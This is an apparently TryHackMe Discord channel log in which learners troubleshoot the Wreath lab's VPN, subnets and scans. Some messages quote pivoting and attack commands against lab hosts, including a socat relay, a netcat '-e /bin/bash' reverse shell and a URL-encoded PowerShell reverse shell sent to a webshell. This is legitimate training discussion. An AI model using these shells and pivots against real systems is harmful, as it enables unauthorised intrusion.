#wreath-network
i mean if i leave the room, it still shows up in my rooms... its as if i never left
no option to join because i never left...and i dont get a vpn file
This should be resolved by the support team easily, I am not sure why they aren't addressing
they say they cant kick me out of the room
😶
did u join a different network ?
Yes, actually since the wreath was making the issue, I joined holo and started playing
I had a different subnet: 10.200.85.200
yeah i think thats the problem, that subnet must be bonkers, but i cant leave it
like a toxic ex
Lol
woah, I just started this network. I like it 👍
Gonna do the same. 2nd time blindly.
Hi guys
So when I upload the nc file to root @prod serv and I try to run it, it doesn’t work
It gives some sort of new line error
Last time I just used the nc file that someone else had uploaded and it worked fine but now the network has been reset and when I upload the file it doesn’t work
And I don’t know why
Can anyone help?
Verify the THM account there
Then share the screenshot of the issue you are facing
HI, can anyone help please?
https://tryhackme.com/r/room/wreath
Task 17
When trying to do nmap scan from .200 machine (prod-serv), all ports for .100 and .150 machines are filtered, however in room walkthrough it says that there should be open ports on .150 machine
You may need to reset the network.
Did it twice during the weekend, didn't help.
It's on 10.201.17.x network, FYI
can confirm I just booted the network (hasn't been reset) and still having the same issue as qwe
mine is on a different subnet, interestingly
The command they provided on task 44 to get the NTLM admin hash from Sam and system is not working; the error is something like "object is not scriptable" (I have downloaded both files on my local machine and I am sure there is no syntax error or typo)
I'm intending to send another reset vote in 5m once the hourly cooldown ends, should make it 3/4
just tried again now that the network has reset, and the ports are still not working
How long ago did it restart?
41m ago
also for avoidance of doubt, in case I am doing something wrong here
oh I can't post images here I guess
You need to verify your account.
When you verify, you can send embedded images and gifs
oh yeah thanks, that worked
Try adding -Pn, I can't remember if that box is Windows or not.
have tried that as well as combinations including -sS, -sX -sF, and -sN
also have tried the entire range of ports, but I'm just testing 1-99 there as I know there's at least one port within that range, given the answer for the task contains ** as one of the ports in it
Hi there,
I can't have a reverse shell for the exploitation phase, Task 6. I already did it a few weeks ago but I tried today and I have this mistake:
I tried with the Attack box and with Exegol. I also tried with Metasploit (exploit(linux/http/webmin_backdoor))
Hi sir,
I tried it but I don't have a reverse shell.
@dull robin
just wanted to check if there is any further info regarding the issue I mentioned earlier? wondering if someone who has completed this room can confirm that it's not just me doing something incorrectly
@merry robin feel like donating some of your time?
I never really finished Wreath, I'll have to at some point.
I mean, there should definitely be ports open on 150, accessible to 200.
The most likely issue is people being dickheads.
Other possibilities include:
- Someone on staff has been messing with the base image and screwed it up. Unlikely, but wouldn't be the first time.
- The security groups have been changed and are now messed up. Again, very unlikely.
- The logic which controls the boxes isn't working properly. I haven't seen the code that does it, but from past experience that's not hugely unlikely.
The first two options would affect every subnet, so I suspect we'd be seeing more complaints than we are.
Try:
nmap -Pn -sT -vv -p 3389 10.201.123.150
The null and Christmas scans probably won't do much there, but that should give you a clear answer.
Tried this on 10.201.17.x subnet, 3389 is filtered
Just woke up so haven’t had a chance to test this but I definitely have run a scan with -sT and -Pn on the machine. What makes me think it wouldn’t be the first issue you mentioned (dickheads) is that it’s persisted across network resets, although I suppose someone could be doing the same thing multiple times. I’ve tried this immediately after a network reset though, when I wouldn’t think there’s enough time to close all of the ports on 150.
okay yeah I've run the command immediately after a network reset just now, at the first possible opportunity (as 200 took some time to become accessible)
Yeah, I have no idea what's going on there then. Something must have happened to either the security groups or the instance itself (cc @fair breach)
Hey, I'm currently on the first-nmap scanning inside the host, I've uploaded the static nmap binary, however, firstly it takes hours to run the scan on a single host, secondly, it doesn't output the open ports for me, any suggestions?
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 13:38 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.03% done
Stats: 0:01:47 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.10% done; ETC: 14:03 (0:23:20 remaining)
What command are you running
./nmap-dakiddo -T4 -p1-15000 10.201.135.150 -oN scan-full.txt
25 mins per scan is a pretty long time, idk what's wrong
Well you are scanning 15000 ports
Yeah thats the task, what I mean is even when the scan finished, I don't get the output of open ports for me
What kind of access do you have? SSH?
yup
That’s weird. It should output it, can you send a screenshot of what you see after you ran a scan
Verify yourself first so you can send screenshots
Hey guys I could really need some help, while inside the root@prod-serv, both IP's return me filtered ports
[root@prod-serv tmp]# ./nmap-dakiddo -p80 10.201.134.150
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 14:24 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-201-134-150.eu-west-1.compute.internal (10.201.134.150)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.20s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 02:32:93:AC:B3:5B (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
[root@prod-serv tmp]# curl http://10.201.134.150
^C
[root@prod-serv tmp]# curl http://10.201.134.150:80
^C
[root@prod-serv tmp]# ./nmap-dakiddo -p80 10.201.134.100
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-14 14:25 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for ip-10-201-134-100.eu-west-1.compute.internal (10.201.134.100)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (-0.20s latency).
PORT STATE SERVICE
80/tcp filtered http
MAC Address: 02:14:79:D0:ED:F3 (Unknown)
@stiff thorn this isn't just you, a couple of people have had the same issue (including myself)
see #wreath-network message conversation
I spent about a day and then just moved onto other rooms while I wait for it to be resolved
Next on the list.
@jabba.sh please escalate lmao
Network go brrrr
Tf
@cyan vine
There we go
no ports appear open on .100 or .150 from prod-serv
Guessing security groups if no one has messed with the boxes
But yes. TL;DR: needs debugged
Hello, did you run this from 10.201.123.200?
Looking into this now.
was afk sorry, yeah I did
I am trying to find out when the subnets for Wreath changed from 10.200.x.x to 10.201.x.x and if that is causing the issue.
Subnet is still 10.200.x.x for me.
Is it working for you when running nmap from 10.200.x.200 to 10.200.x.150?
Not getting any response currently
Back to drawing board I go. 😄
Aah, the subnet deception. 😉
from the prod-serv with the reverse shell included in the exploit. I got some open ports. Can't remember if that's all of them, but the scan is still running.
hope that helps.
Aah so from 10.200.52.200 it is working.
Thank you that is very useful. 🙏
yup, seems like it, you are welcome. Glad I could be a little help.
Will have to check whether the security-group for .150 specifies allow inbound based on 10.200 even when in a 10.201 subnet.
Hey, still a problem here for me. IP address of prod-server 10.201.134.200, both 100 and 150 seems filtered, can't curl http on 150 also, any suggestion?
After reset ofcourse, still doesn't work
Hello, we're still investigating the cause of the issue with 10.201 subnets. Will provide an update when I know more. 🙏
./coder-nmap 10.201.17.150 -vv
Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2024-08-18 14:18 BST
Unable to find nmap-services! Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Initiating ARP Ping Scan at 14:18
Scanning 10.201.17.150 [1 port]
Completed ARP Ping Scan at 14:18, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:18
Completed Parallel DNS resolution of 1 host. at 14:18, 0.00s elapsed
Initiating SYN Stealth Scan at 14:18
Scanning ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150) [6150 ports]
SYN Stealth Scan Timing: About 23.75% done; ETC: 14:21 (0:01:40 remaining)
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 23.90% done; ETC: 14:21 (0:01:39 remaining)
SYN Stealth Scan Timing: About 48.06% done; ETC: 14:21 (0:01:06 remaining)
SYN Stealth Scan Timing: About 72.37% done; ETC: 14:21 (0:00:35 remaining)
Completed SYN Stealth Scan at 14:20, 124.32s elapsed (6150 total ports)
Nmap scan report for ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up, received arp-response (-0.20s latency).
All 6150 scanned ports on ip-10-201-17-150.eu-west-1.compute.internal (10.201.17.150) are filtered because of 6150 no-responses
MAC Address: 02:49:B0:CA:79:3F (Unknown)
Read data files from: /etc
Nmap done: 1 IP address (1 host up) scanned in 124.57 seconds
Raw packets sent: 12302 (541.256KB) | Rcvd: 1 (28B)
hope u fix it guys, it has been like this for days
Hello, can you please retry today on 10.201.17? 🙏
Can you please retry today on 10.201.123? 🙏
Can you please retry today on 10.201.134?
this seems to be working for me, haven't finished the scan yet but did see this output already
Discovered open port 3389/tcp on 10.201.123.150
Discovered open port 80/tcp on 10.201.123.150
Discovered open port 5985/tcp on 10.201.123.150
It works, thank you!
Awesome! 😎
@blazing rock just want to confirm, should 150 be able to ping 200 and 100 from it?
I'm having difficulties establishing any sort of communication out from 150 back to 200, i.e. pings aren't working, and the powershell reverse shell command listed in the network task is stalling for 10s ish and then just dying, and socat -v isn't showing any data being transmitted
could very well be something I'm doing wrong but I figured I'd ask just because it seems like the sort of thing that might be related
context:
on prod-serv:
Same problem here (10.201.17.200)
As a workaround, you can run commands from the next task (21) via curl/burp. I managed to create a user and logged into .150 machine via evil-winrm
Hello, which task is this, and are you following the commands provided in the task?
Got stuck on Task 29 - generated stager doesn't work on .150 machine, I'm getting empty output after trying to run the stager via webshell (no agent being created)
Probably because of the same reason I and @plain zephyr had problems with Task 20. Connection cannot be established from .150 back to .200
I get an exception with the following error message when trying to run the stager via Evil-winRM:
Exception calling "DownloadData" with "1" argument(s): "Unable to connect to the remote server"
Task 20 for me, yeah. the task directs me to copy and paste the powershell command, substituting my IP on the VPN as well as the port (16969 in my case, which you can see is being forwarded via socat on prod-serv)
I also ran firewall-cmd --zone=public --add-port 16969/tcp so can confirm that was done
Is the network working for others? The Git server appears down and inaccessible for me.
for the record, I've tried resetting the network and redownloading the config file, nothing works.
.200 machine (git server) is accessible for me (10.201.17. subnet)
Did anyone make it through Task 29? It looks like there's still no connection from .150 to .200
10.201.149.150 still inaccessible
This should be fixed, you may need to reset the network.
It works, thanks!
Got the same problem again on 10.201.17. It worked for a while, but then suddenly stopped. Cannot connect to .200 machine from .150
Tried network reset, the problem persists
Also, it seems that .100 machine is down. Can't access .100 web page after successfully establishing connection via chisel and adding socks5 proxy via FoxyProxy
Unable to download wreath network config file ,
Upon downloading greeted with unknown error occurred msg
Can someone please check if all ports on the wreath network are in ignored state please, 'cause I don't think it's supposed to be like that.
Hello hello.
This is a network room, so all people will be split in to their own networks, so something that you have an issue with, somebody else might not..
It would be helpful if you supply the IP of the room so people can see if they're in your subnet or not.
ok
I'm not too sure where to find it
Is it the top of the three computers?
10.200.73.200
ok it works
pwd
/usr/libexec/webmin
cd ..
pwd
/usr/libexec/webmin
cd ..
pwd
/usr/libexec/webmin
Help I can't get out of this directory
Are you using the pseudo-shell in the exploit by any mischance?
Well I had to 'cause that's what made it work
The key word there is "pseudo". It's not an interactive shell -- just a wrapper around a HTTP endpoint which accepts shell commands and returns the output.
Things like changing the directory won't work because there's no persistence.
Hence why the next step is to get a real shell
Got one but the real one is the one with the problem, that's why I had to use the pseudo one
The real one won't change directory?
Yup
As in, one caught with netcat?
yup exactly that one
Well that's weird. Have you tried adding an SSH key and logging in that way?
Well I tried getting the shell differently and that also worked
Feck.
Had my SSH connection going and everything but it shut down 'cause I forgot to click the Extend button in the last hour 😢
It's [allegedly] back up now, but nothing's responding 😡
Uptime is 34mins - anyone able to confirm things are responding? (can ping 10.50.55.1, nothing from 10.200.57.200)
i'm trying to install powershell empire when i run the command to start the server i get a python error
Traceback (most recent call last):
File "/usr/share/powershell-empire/empire.py", line 11, in <module>
import empire.server.server as server
File "/usr/share/powershell-empire/empire/server/server.py", line 14, in <module>
from empire.server.common import empire
File "/usr/share/powershell-empire/empire/server/common/empire.py", line 18, in <module>
from empire.server.core import hooks_internal
File "/usr/share/powershell-empire/empire/server/core/hooks_internal.py", line 5, in <module>
import jq as jq
ModuleNotFoundError: No module named 'jq'
any idea ? i tried installing the jq module using apt install python3-jq but no good
Hi everyone. I got a problem in Wreath
when i use sshuttle to set up an agent
The command
sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24
Response: [local sudo] Password:
but i can't brute it with hashcat
Does anyone know the code
What are you trying to brute force here?
It's asking for your password. not for id_rsa
Password for your user on your system, it needs root privileges to setup the shuttle
ohh it ask me the kali user password? i will try it . thanks too much
I also get a mistake sudo sshuttle -r root@10.200.105.200 --ssh-cmd "ssh -i id_rsa" 10.200.105.0/24
Connection closed by 10.200.105.200 port 22
c : fatal: failed to establish ssh session (2)
What's the reason for this?
Is the network up?
There should be a note or something for sshuttle in the room, -x flag maybe
the network is ok.
the -x flag i have already tried
the root id_rsa file i just copy it content then create a file in kali Then paste the content in and give 600permission
should i mv the orginal file into my kali by http
Are you able to login, ssh -i id_rsa root@...?
I tried that. It didn't work
Then something is wrong on the server. Maybe someone changed the SSH port or stopped it altogether, access the server the way you did to set up the id_rsa there. Gotta figure out on your own.
If it doesn't work, try voting for network reset at last.
Okay, I get it. Thank you
jq is not a python module 🙃
Why is curl request blocked but ping is permitted
From prod and pc I can ping my machine but I can’t curl
curl may not be installed.
||Are you actually using curl?|| 😉
I cannot download VPN configuration for Wreath as of today
If you can on your side, please help
More details with screenshots under #site-support : #site-support message
One other user @balmy dirge reported the same issue
Yep.
in r/access page, for machines , does the connection show connected for you ? it show not connected for me, even when vpn is connected
The connection status in the Access page is supposed to be broken: check this message from @sharp ice that has been pinned in #site-support :
#site-support message
So, you should not rely on the information you see there
Ah. Thanks for clarifying.
About these issues affecting Wreath and Holo networks, I am helping another user in #room-help about the Active Directory network called "Lateral Movement and Pivoting"
And I have just realized that you can use the AttackBox without using the VPN configuration; up to recently, there was a bug whereby you had to use it
Have you tried Wreath using the AttackBox?
Well, forget about that: Wreath needs that VPN config file in all circumstances: see screenshot
leaving room , moves me to 10.200.71.x, joining takes me to 10.200.84.x. same for you ? There is no change of subnet happening for me.
leaving and joining does change the IP address for prod-serv on the network diagram for Wreath
I have just done it right now:
- from 10.200.101.200
- to 10.200.84.200
which means leaving/joining moved me from subnet 10.200.101.0/24 to 10.200.84.0/24
if I read your message correctly, leaving/joining moved you from subnet 10.200.71.x to 10.200.84.x
BTW: still not possible to download VPN configuration though
Ah, got it.
BTW, one more report of Wreath not working: from my reply linked here, you can move to the original report:
#room-help message
p sure yes because i do get the curl help page and i get curl based errors unless ur implying that the curl installed on both machines is faulty
and also certutil doesnt work 😔
||there is an ssh.exe file tho so maybe i can try reverse tunneling but idk if it will just simply not work I also tried to execute a php rev shell and a powershell rev shell via the PoC on the personal PC||
IIRC I was able to use curl.
Are you on the first or the second machine?
both
technically its the third
ill try leaving the room and rejoining after a while
You'll need to make sure ports are forwarded (at each hop) - or that machine 2 has an open port (from M3, etc.)
yea i made sure they were open
have you retried again ? any luck ?
I had retried this morning, and once more now: same problem
this morning, I had retried after another user reported similar issue with another network, "CI/CD and Build Security". The details are here, and in subsequent messages:
#subs-room-help message
also, the "Holo" network has a problem similar to Wreath. This has been "officially" acknowledged by @blazing rock here:
#holo-network message
I cannot download the VPN configuration file for the Wreath network and I cannot regenerate it either
Symptoms: the download or regenerate buttons spin for 1 minutes, with no effect
no VPN file means no access to Wreath network for me
I have just created a support ticket for that
If you have the same issue, please consider creating a support ticket too, so that the issue gets the right visibility
NB: you create a support ticket by clicking on THM cloud bubble displayed at the bottom right of each THM web page
Assuming you've tried this? #wreath-network message
yes, multiple times, waiting minutes or hours after leaving before joining again
BTW: this is the exact same behaviour as for Holo network, which has been acknowledged by @blazing rock at the WE: #holo-network message
Gotcha, well hope it gets resolved soon
Let me try it now. It works for me on 10.201.134
Which subnet are you on? 10.200.x (where x is a number)
10.200.87.200
that is the one I have used in my support ticket, but of course each time I have left before joining again, I ended up on a different subnet
to be clear: I would not be surprised the network works, that is useful for all the users who have downloaded their VPN file some time ago
the problem is for me: I do not have that VPN file and cannot download it, so I am locked out of Wreath
I understand 🙏 , I successfully downloaded the ovpn file today, so I imagine something else is going on. Trying to figure out what is amiss. I am investigating with the team. 🙂
If you don't mind, can you please try leaving the room and rejoining, and try to get on a 10.201.x subnet? If you are successful in that, try to regenerate the ovpn file and download it.
I am starting that
the next network was 10.200.84.X, but I am stuck on it, probably because I am doing the leave/join too fast
I'll slow down
Here is the progress so far:
10.200.87.X: starting point
10.200.84.X: (multiple times: too fast)
10.200.85.X
10.200.87.X: again!
10.200.101.X
10.200.105.X: 500 error browsing Access page (see screenshot)
10.200.57.X
10.200.73.X
I'll do a couple more before I leave for the night. Now is bedtime
I can carry on tomorrow: if you have a recommendation as to how much time to wait before to join (and to leave?), that would optimize the speed of the process
Thank you for your kind help
screenshot shows the error page when browsing to Access page while on 10.200.105.X
Let me try to get into a 10.200.x subnet and see what happens. Going to wait 10 minutes before rejoining.
I can't download the wreath openvpn file it says "An unknown error has occurred". I tried leaving the room and rejoining this didn't work too.
was just about to come and say the same thing. also tried to "generate" but tna
I suggest you open a support ticket, so that THM is aware of the scope of the issue
the more documentation of the problem, the better: screenshots, etc.
also, include the subnet (s) you had been assigned (10.200.<subnet>.X)
Sept 17: progress update results
MONDAY:
10.200.87.X: starting point
10.200.84.X: (multiple times: too fast)
10.200.85.X
10.200.87.X: again!
10.200.101.X
10.200.105.X: 500 error browsing Access page (see screenshot)
10.200.57.X
10.200.73.X
TUESDAY:
10.200.84.X first of Tuesday
10.200.101.X VPN DL OK
ping 10.200.101.200: KO
33 min up: voted 3/5 then 4/5 for reset
no ping after 55 minutes up
regen VPN: nothing better
10.200.85.X
10.200.87.X again!
10.200.57.X
10.200.96.X
10.200.43.X
10.200.87.X again!
10.200.84.X again!
10.200.105.X
10.200.57.X again!
VPN DL OK
10.200.84.X again!
10.200.87.X again!
10.200.101.X again!
500 error page for DL and regen
10.200.57.X again!
VPN DL/regen KO this time
10.200.84.X again!
10.200.87.X again!
10.200.101.X again!
Methodology:
- wait min 10 minutes before joining after leaving
- wait min 5 minutes for network to be up before ping + nmap and VPN config download
Conclusion so far:
- no 10.201.X subnet reached so far
- slow process
- I cycle too often through the same subnets
- I cannot see a pattern giving hope to escape from a 10.200.x to a 10.201.x subnet
- ~~ will try for the rest of the day~~
- will stop after today unless there is a better methodology
I look forward to more guidance
What was the result for you?
Mine on 10.200.84 does not want to regenerate the config file, it results in a 504 error. Still investigating. 🙏 Thank you for your detailed attempts.
hm.. even my attackbox dont have wreath.ovpn and i am a subscriber.
will add this information to my ticket.
The interface for wreath on a sub is tun0
seems to be a bigger issue i am unable to reach wreath even from atkbox
I am unable to download VPN config file for Wreath network as well.
I get 10.200.87.200 network. I have tried regenerating the VPN config, and then download, but it just spins and displays "An unknown has error occurred" after few seconds.
Similar issue with Holo. IP assigned to DC-SRV01: 10.200.95.30
I have the same issue
You can read previous messages of this channel, in particular starting from this one: #wreath-network message
same issue too for me
follow messages for that network in #holo-network
in particular this message: #holo-network message
I'm having the same problem now too. Worked fine a couple of days ago then switched networks due to 10 day limit. I get a 500 error when I try to regenerate a new vpn config. Tried pinging with attack box and get no joy there either.
for me certainly: #wreath-network message
Is this just not even gonna be acknowledged, just paid 12 bucks for a non-functional room
Its been acknowledged by timtaylor, but no fix yet as far as I can see - you could email support and see what they say support@tryhackme.com
I contacted support yesterday, no response.
May take a few business days to get a response from them
Support is delayed.
this screen pop up when i tried to download wreath configuration file, Do I need to take action or just it is a temporary issue?
getting same error message
I wasn't able to download VPN since last week
contacted support and hasn't received response yet.
I think it is an intermittent problem, but it repeats itself as you cycle through different subnets for Wreath after you leave and join
I suspect however you will not be able to download the VPN config file for Wreath, and therefore will not be able to use that network
you can see here my attempts: #wreath-network message
if it fails for you, I suggest you create a support ticket with THM (check the THM cloud bubble icon on the bottom right of each THM web page) and that you document the issue including the subnet or subnets you have been assigned while attempting
I think your ticket will add to the previous ones, like mine, and raise the visibility of the issue with THM
thank you
when did you contact support for this?
last week
same for me
Anyone able to download wreath's vpn? I still see 500
Hello guys. I have intermittent network problems reaching wreath network boxes. It's getting worse since yesterday and it's not possible to work on it. When one box is available, the other is not reachable. I can see here I am not the only to complain. I am new to Try Hack Me so how can we get this solved?
Just for clarification I did succeed to download the openvpns config and connected to the network (more or less) but then machines are not accessible (through ssh for .200, through winrm for .150) etc.
this is what i got from the support team:
I see that you opened multiple tickets - I see that the problem was about wreath. Unfortunately that is a global issue and is present for all the users - our team is working on the fix but we are not sure how long it will take
And it's true, the team are looking in to it, as this not isolated to yourself.
yeah got that
I canceled my subscription, it makes no sense to pay where there is no service.
any updates ?
I saw this message earlier today from @abstract grove , who is THM staff:
#site-support message
Just peeping here, time to time, to check if its working 🙂
is this still unresolved?
it seems it is still not working
commenting so the channel does not disappear from my discord interface
Your channels disappear?
only non main ones, like if I search for a more niche room channel and I don't comment in it, it does not stick in suggested
Are you mobile or desktop?
desktop, but it applies to any "hidden" channel that normally does not appear unless you specifically navigate to it
Have you enabled this?
first, time I see it, now it unlocked a bunch more channels, cheers
anyone else able to interact with the network ? I get the VPN file and an internal IP, but the target does not respond to anything.....
yes for me: tried 3-4 hours ago and again now
I can ping 10.200.73.200
I guess you are not doing like me 15 minutes ago, i. e. trying to ping while the Network state said Stopped 🫢
```
12: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.50.66.6/24 scope global tun0
valid_lft forever preferred_lft forever
inet6 fe80::f58d:a217:afdb:b3db/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
kali@kali:~/Downloads/Wreath [14-10-2024 15:26]$ ping 10.200.73.200
PING 10.200.73.200 (10.200.73.200) 56(84) bytes of data.
^C
--- 10.200.73.200 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1012ms
kali@kali:~/Downloads/Wreath [14-10-2024 15:26]$
```
can you share your tunnel ip interface ?
btw opened ticket 4 hours ago and no replies 
and it's running as far as I can see
tun0: 10.50.66.7
I am using my local Kali VM
as I was confused with ping going wrong (with the state Stopped), I regenerated my VPN
it was not necessary, of course
that may be another option for you?
okay, I restarted by VM again and now it works
now I will try to blitz through it one go to avoid troubleshooting it again 
Ah wreath isnt working, i thought it was just me
Wreath working for me: check my instance on the screenshot
if is true there have been problems, but all good for me for 1 week
hello,,, anyone who knows a proxy that is free of charge please?
hello guys, does the wreath room work? I click on join room several times but it doesn't work, I wonder if it's only me who has this problem?
I reached out to support 2-3 weeks back.. they said they have been working on it. No resolution yet
I'm gonna check for few more days and cancel my subscription
There was a fix pushed out, which issue were you having?
The network doesnt start...
The network works if you restart it I think
Or sorry If you leave the room
But I'm gonna go ahead and reset it
I thought im the only one who experiencing this issue
wreath network still not working
Networks as a feature appear to just be... broken... right now.
That's been the case for several months. Staff are aware.
Gotcha!
Hey, are you still experiencing issues?
I'm having an issue starting joining the wreath room. I click on "Join Room" and nothing happens
Also, I restarted the room's progress a couple of months ago, yet it's still showing my previous progress for some reason
I am gonna re-check again, and let you know. It didn't work the last time. Also i was not able to connect to network for some reason.
its working @mellow sleet 🙂
cannot ping the first IP address given to test network access. I am using attackthebox
"If you are a subscriber and are using the AttackBox then you will be able to find this connection pack in a directory on your desktop. This will be automatically connected when the AttackBox starts so don't run the connection pack manually on the AttackBox if you are a subscriber."
well clearly not
if it automatically connected
I would be able to ping the IP address in the diagram
@merry robin
I'm gonna be honest -- I have no idea what's going on with the THM network infrastructure.
It's not something I have any control over, and it seems to be broken for a lot of people. The network itself is fine, but the infrastructure which hosts it does not appear to be.
Raise a support ticket and see what they say
Its alright I just used my Kali VM instead, seems to work fine so far.
If they want to fix the attackthebox issue they can just view my comment above in this chat. Saves me having time to put in a ticket
network down again, this room is horrible
Hey, don't blame the room 
The network is fine tyvm... as long as the hosting side of things works.
... Which it doesn't seem to be a lot of the time these days
Yep its not
the content is good though I will give it that
Question
I'm reading through the Reverse Shell Relay section under Pivoting: Socat in the Wreath room
I understand up to where we create the relay - the execution of ./socat tcp -l:8000... on the compromised server - socat is now listening on 8000 and relaying that connection back to Kali, right?
But I get confused on this bit:
From here we can then create a reverse shell to the newly opened port 8000 on the compromised server. This is demonstrated in the following screenshot, using netcat on the remote server to simulate receiving a reverse shell from the target server:
chmod +x ./nc-MuirlandOracle
./nc-MuirlandOracle 127.0.0.1 8000 -e /bin/bash
Where did the nc-<USERNAME> come from and what is the netcat listener doing on prod-serv in this scenario?
It's just to demonstrate that the relay works
If you were doing this "properly", netcat would be on a different server
Thought that was the case - thank you - the 'different server' would be on the target host (not the compromised server or the attack server)?
Gave +1 Rep to @merry robin (current: #10 - 804)
I achieved the Enumeration, Pivoting and Code Review sections for Wreath two days ago. But i couldn't spend time on it yesterday so i am picking it up again today.
I am reconnected to the VPN and can successfully ssh into prod-serv using the id_rsa key
However, i cannot sshuttle via git-serv today. I am using the following command (same as two days ago):
sshuttle -r root@10.200.101.200 --ssh-cmd "ssh -i id_rsa" 10.200.101.0/24 -x 10.200.101.200
But i get this error:
Traceback (most recent call last):
File "/usr/local/bin/sshuttle", line 5, in <module>
from sshuttle.cmdline import main
File "/usr/local/lib/python2.7/dist-packages/sshuttle/cmdline.py", line 5, in <module>
import sshuttle.client as client
File "/usr/local/lib/python2.7/dist-packages/sshuttle/client.py", line 302
assert(not re.search(rb'[^-\w\.]', hostname))
^
SyntaxError: invalid syntax
Why would I now be getting an error for sshuttle when it worked two days ago?
And if i run the python exploit
./43777.py
It hangs after
[+] Get user list
I'm gonna hazard a guess and say sshuttle is probably not meant to be using Python 2
Yeah, I'm seeing Python 3 in their code base. Reasonable chance you've screwed up your global python environment somewhere along the way.
Correct
👍
I now have everything working again and i have run the following commands:
TAB 1
┌──(kali㉿kali)-[~/Desktop/THM/Wreath/Pivoting]
└─$ ssh -i id_rsa root@10.200.101.200
[root@prod-serv ~]# firewall-cmd --zone=public --add-port 15151/tcp
success
[root@prod-serv ~]# curl <KA.LI.IP.ADD>/socat -o /tmp/socat-1of3 && chmod +x /tmp/socat-1of3
...
[root@prod-serv ~]# /tmp/./socat-1of3 tcp-l:15151 tcp:<KA.LI.IP.ADD>:443 &
[1] 2586
[root@prod-serv ~]#
TAB 2
┌──(kali㉿kali)-[~/Desktop/THM/Wreath]
└─$ sshuttle -r root@10.200.101.200 --ssh-cmd "ssh -i Pivoting/id_rsa" 10.200.101.150 -x 10.200.101.200
[local sudo] Password:
c : Connected to server.
TAB 3
┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ sudo nc -nvlp 443
listening on [any] 443 ...
But my PowerShell Reverse Shell command hangs for about 10-20 seconds and then drops and nothing shows up in my nc listener tab...
TAB 4
┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$ curl -X POST -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.101.200%27%2C15151%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22" http://10.200.101.150/web/exploit-1of3.php
""
┌──(kali㉿kali)-[~/Desktop/THM/Wreath/GitServer]
└─$
Have I missed something?
❗🥺 Could I get some help please? I have tried again today and sanity checked my approach but no luck. Thank you!
Any help would be appreciated - thank you 🙂
what is this help pls why i cant download the access ovpn
I had this problem too, I had to leave room and join room and try to download the ovpn file until I found a room that worked. Took about 4 times for me.
ok bro i'll try it thanks
I keep getting this same error. I tried leaving and rejoining the room as suggested above, but still keep receive the error message
getting same problem
not able to download the VPN config file for Wreath
getting 500 error .
please confirm you are a subscriber or that you have a 7-day streak
do like user Rapsberry Rat suggested above: #wreath-network message
if you want the full story of their experience, start with this message: #site-support message
I am pretty confident you will be able to download the VPN config file if you repeat the procedure multiple times
I am a subscriber
Additionally I tried to use the AttackBox and that didn’t work either.
even for the AttackBox, as there is currently a problem, you have to download the VPN config file
what is your network instance for Wreath? And is it in the state of Running?
On the attack box the txt file said that configs were already set. Also yes, the network status was running. I even voted to reset it and still couldn’t get the network to respond to nmap scans
I know that the network config should be ready, but like I said there is currently a problem, whereby you have to download the VPN config file for THM AttackBox as well and run it with openvpn
proof of that problem: if you do ip link (or ip a, does not matter), you should have tun0 listed, but it is missing (check my screenshot: I have just started an instance of THM AttackBox)
Gotcha. When I attempted to download the config file I received the 500 error
you said earlier you did leave/join, with no success
you have to repeat that multiple times (I know it is a pain)
apparently, it helps if you leave minutes (possibly 15) between the leave and the join
how many times have you done that leave/join so far?
for user Raspberry Rat, it took them 4 times (check here: #wreath-network message)
I did it about 6 or 7 times
I suggest:
- you leave more time between leave and join
- make sure the new VPN config file is different from the previous one. For instance, check that the MD5 hashes for the two files are different (command for that is md5sum <file_name>)
- pay attention if you join the same instance as mine: 10.200.85.X, it works for me right now (check screenshot), hence I expect it should work for you too
